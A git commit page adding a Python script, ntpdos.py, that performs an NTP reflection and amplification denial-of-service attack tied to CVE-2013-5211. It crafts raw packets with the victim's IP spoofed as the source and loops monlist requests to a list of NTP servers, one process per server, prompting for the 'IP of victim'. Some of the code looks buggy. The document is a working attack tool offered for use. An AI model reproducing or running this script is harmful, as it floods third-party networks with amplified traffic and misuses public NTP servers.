diff options
| author | Alexander Pickering <alexandermpickering@gmail.com> | 2016-06-06 16:39:18 -0400 |
|---|---|---|
| committer | Alexander Pickering <alexandermpickering@gmail.com> | 2016-06-06 16:39:18 -0400 |
| commit | d207aae7ac855d71c3d120b7ce420c200f634e1b (patch) | |
| tree | ccf8d702703c5744a84583b59002f423700df605 | |
| download | CVE-2013-5211-d207aae7ac855d71c3d120b7ce420c200f634e1b.tar.gz CVE-2013-5211-d207aae7ac855d71c3d120b7ce420c200f634e1b.tar.bz2 CVE-2013-5211-d207aae7ac855d71c3d120b7ce420c200f634e1b.zip | |
| -rw-r--r-- | ntpdos.py | 129 |
1 files changed, 129 insertions, 0 deletions
diff --git a/ntpdos.py b/ntpdos.py new file mode 100644 index 0000000..03391e8 --- /dev/null +++ b/ntpdos.py @@ -0,0 +1,129 @@ +from multiprocessing import Process +import socket +from sys import * +from struct import * + +""" + (c) Alexander Pickering 2013-2016 + With code from http://www.binarytides.com/ + + A DDOS attack that leverages NPT servers, + Requires an input file, with each ntp on a different line +""" + +class targetOne(): + + def __init__(self, target, victim): + payload = b'\x17\x00\x03\x2a\x00\x00\x00\x00' + gid = 54321 + + s = socket.socket(socket.AF_INET,socket.SOCK_RAW,socket.IPPROTO_RAW) #Create the socket + + ipheader = pack('!BBHHHBBH4s4s', + 85, #IHL version + 0, #Type of service + 0, #Total length, will automatically fill in correct lenghth + gid, #Global id of this packet + 0, #Fragment offset + 255, #Time to live + socket.IPPROTO_UDP, #Protocol + 0, #Header checksum, will automatically fill + socket.inet_aton(victim), #Spoof the victim's ip as our own, so data gets sent there + socket.inet_aton(target)) #The NTP server + + udpheader = pack('!HHHH', + 0, #Source port + 123, #Destination port for NTP + 0, #Length, automatically filled in + 0) #Checksum, filled in later + + pseudoheader = pack('!4s4sBBH', + socket.inet_aton(victim), #Spoof source address + socket.inet_aton(target), #The NTP server + 0, #Placeholder for length + socket.IPPROTO_UDP, + len(udpheader+payload)) #Length of the packet + + brokepacket = pseudoheader + udpheader + payload #create an incorrect packet + + check = self.checksum(brokepacket) #Get the checksum + + udpheader = pack('!HHHH', + 0, + 123, + 0, + check) #Re-create the udp packet with the correct checksum + + packet = ipheader + udpheader + payload #The final packet to send + + print("Sending packet:\n" + str(packet)) + print("Attacking!!!\n press ctrl+c to stop") + + while(True): + s.sendto(packet,(target,0)) #Send the packet + + ##Checksum function taken from http://www.binarytides.com/ + def checksum(self, msg): + s = 0 + for i in range(0,len(msg),2): + par1 = ord(chr(msg[i])) + par2 = ord(chr(msg[i+1])) + w=par1 + (par2 << 8) + s=s+w + s=(s>>16)+(s&0xffff); + s=s+(s>>16); + s=~s&0xffff + return s + +class ntpspam(): + + def f(self, victim = None, filename = None): + if(victim == None): + victim = input("IP of victim:\n") + if(filename == None): + ntpfilename = input("Name of file containting ntp servers\n") + else: + ntpfilename = filename + ntpfile = open(ntpfilename, 'rb', buffering = 0) + done = False + ip = '' + returned = False + x = 0 + processes = {} + while(not done): + char = ntpfile.read(1) + char = str(char)[2:-1] + if(char == '\\n' and returned): + print("useing ntp " + ip) + returned = False + p = Process(target = self.makeOne, args=(ip,)) + p.start() + processes[x] = p + x += 1 + ip = '' + elif(char == '\\r'): + returned = True + elif(not char == ''): + ip += char + else: + done = True + print("done,useing ntp " + ip) + returned = False + p = Process(target = self.makeOne, args=(ip,victim,)) + p.start() + processes[x] = p + x += 1 + ip = '' + ntpfile.close() + + def makeOne(self, ip, victim): + one = targetOne(ip, victim) + +if(__name__ == '__main__'): + try: + n = ntpspam() + n.f() + except Exception as e: + crash = open('crash.log', 'w') + crash.write(str(e)) + crash.close() |